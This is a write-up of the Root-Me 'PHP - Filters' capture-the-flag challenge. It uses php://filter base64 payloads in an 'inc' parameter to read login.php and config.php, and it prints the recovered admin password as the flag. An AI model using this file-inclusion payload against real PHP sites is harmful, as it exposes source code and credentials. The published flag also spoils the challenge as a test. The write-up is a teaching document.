PHP - Filters
- Points: 25
- Link: https://www.root-me.org/en/Challenges/Web-Server/PHP-Filters
Statement
Retrieve the administrator password of this application.
Solution
Click to login button, and look at the url
1
http://challenge01.root-me.org/web-serveur/ch12/?inc=login.php
So $inc = $_GET['inc] will query to a page. I guess file_get_contents($inc) or include($inc) function must have been used.
Try PHP Conversion Filters to get page’s PHP code
1
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=login.php
It works!
We got a PHP code encoded by base64. Decode it and there is it, PHP code
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
include("config.php");
if ( isset($_POST["username"]) && isset($_POST["password"]) ){
if ($_POST["username"]==$username && $_POST["password"]==$password){
print("<h2>Welcome back !</h2>");
print("To validate the challenge use this password<br/><br/>");
} else {
print("<h3>Error : no such user/password</h2><br />");
}
} else {
?>
<form action="" method="post">
Login <br/>
<input type="text" name="username" /><br/><br/>
Password <br/>
<input type="password" name="password" /><br/><br/>
<br/><br/>
<input type="submit" value="connect" /><br/><br/>
</form>
<?php } ?>
The challenge said
1
print("To validate the challenge use this password<br/><br/>");
So we need to find password.
There is another file, config.php. password may be in that file. Now we will read it
1
http://challenge01.root-me.org/web-serveur/ch12/?inc=php://filter/convert.base64-encode/resource=config.php
1
2
3
<?php
$username="admin";
$password="DAPt9D2mky0APAF";
The flag is
1
DAPt9D2mky0APAF
This post is licensed under CC BY 4.0 by the author.